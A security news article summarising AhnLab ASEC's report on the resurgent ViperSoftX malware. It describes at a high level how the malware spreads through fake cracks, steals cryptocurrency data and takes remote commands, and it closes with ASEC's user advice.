Ddos 
Flowchart | Image: ASEC
The AhnLab Security Intelligence Center (ASEC) has issued a fresh warning about the resurgence of ViperSoftX, a stealthy and evolving malware strain designed to hijack systems, steal cryptocurrency, and execute remote commands—all via deeply obfuscated PowerShell scripts.
In recent weeks, ASEC confirmed that the threat actor behind ViperSoftX has been “continuously distributing malware to users in Korea“, though the campaign is global in scope. Originally discovered in 2020, ViperSoftX remains one of the most persistent threats targeting users through cleverly disguised software packages and file-sharing sites.
According to ASEC: “The method of disguising malware as illegal duplication programs such as cracks and keygens… is affecting a large number of victims worldwide.”
These fake installers are often bundled with TesseractStealer, Quasar RAT, and other payloads to extend the attacker’s foothold within the compromised machine.
Once inside the system, ViperSoftX sets up scheduled tasks that decode and execute Base64-encoded PowerShell commands. These commands either:
- Decrypt malware stored within disguised local files
- Or fetch commands dynamically from a Command & Control (C&C) server
ASEC explains: “The PowerShell command stored in the registry also acts as a downloader.”
This flexible infrastructure allows the malware to update itself and load additional modules such as PureCrypter and PureHVNC for enhanced remote control.
ViperSoftX is tailored to steal cryptocurrency data and monitor wallet recovery processes:
- It scans the clipboard for BIP39 recovery phrases
- Detects addresses for BTC, ETH, DOGE, XRP, and over a dozen other cryptocurrencies
- Sends stolen data via custom HTTP headers like
X-User-AgentandX-notify
In addition, the malware identifies when users launch wallet applications or browser extensions associated with crypto use.
ViperSoftX monitors:
- Active browser extensions (Chrome, Firefox, Edge, Brave, etc.)
- Installed programs
- Window titles and clipboard activity
More dangerously, it executes remote commands, both PowerShell and full executable payloads:
| Command | Function |
|---|---|
Cmd |
Run PowerShell command |
DwnlExe |
Download and run executable |
SelfRemove |
End operation and clean up |
RestartClient |
Relaunch the malware |
ViperSoftX campaigns also deploy:
- Quasar RAT: .NET-based malware for full system control
- PureCrypter: A commercial loader with injection and evasion features
- PureHVNC: Advanced remote desktop hijacking tool
- ClipBanker: Clipboard hijacker that replaces copied wallet addresses with the attacker’s
“Users must be cautious of installing software downloaded from suspicious websites or file-sharing sites instead of the official website,” ASEC emphasizes.
Related Posts:
- Information-Stealing ViperSoftX Malware Targets Cryptocurrencies and Password Managers Across the Globe
- ViperSoftX Evolves: New PowerShell Malware Boasts Stealth & Persistence
- ViperSoftX Malware: Arabic-Speaking Attackers Exploit PowerShell in New Cyberattack Campaign
- ViperSoftX Leverages Deep Learning with Tesseract to Exfiltrate Sensitive Information
- Beware of “How to Fix” Button: New Phishing Emails Trick Users into Executing Malicious Commands
Donate